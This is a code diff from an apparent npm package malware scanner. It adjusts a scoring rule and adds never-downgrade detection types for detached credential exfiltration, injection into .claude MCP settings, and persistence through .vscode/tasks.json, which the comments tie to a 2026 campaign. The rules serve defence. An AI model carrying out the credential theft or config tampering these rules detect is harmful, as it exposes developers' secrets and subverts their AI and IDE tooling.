   const boostPackageThreats = deduped.filter(t => isPackageLevelThreat(t) && t.boostSignal);
   if (boostPackageThreats.length > 0) {
     packageScore = computeGroupScore([...packageLevelThreats, ...boostPackageThreats]);
-    if (packageScore >= 25 && [...packageLevelThreats, ...boostPackageThreats].some(t => t.severity === 'CRITICAL')) {
+    if (packageScore >= 25 && [...packageLevelThreats, ...boostPackageThreats].some(t => t.severity === 'CRITICAL' && !t.unscopedCompound)) {
       packageScore = Math.max(packageScore, 50);
     }
   }

package/src/shared/bundle-detect.js

@@ -105,7 +105,13 @@ const VETO_TYPES = new Set([
   // IOC hits (never downgraded regardless of context)
   'ioc_match',
   'known_malicious_package',
-  'shai_hulud_marker'
+  'shai_hulud_marker',
+  // Mini Shai-Hulud campaign (2026-05): detached process + credential harvest + network
+  // is the DPRK/Lazarus evasion pattern. Writing to .claude/settings.json or
+  // .vscode/tasks.json is developer tooling persistence — never produced by a bundler.
+  'detached_credential_exfil',   // AST-047 — spawn detached + env + network
+  'ai_config_injection',         // AST-027 — writes to .claude/ MCP config
+  'ide_task_persistence'         // AST-035 — writes to .vscode/tasks.json
 ]);
 
 // Sensitive environment variable patterns. An `env_access` threat whose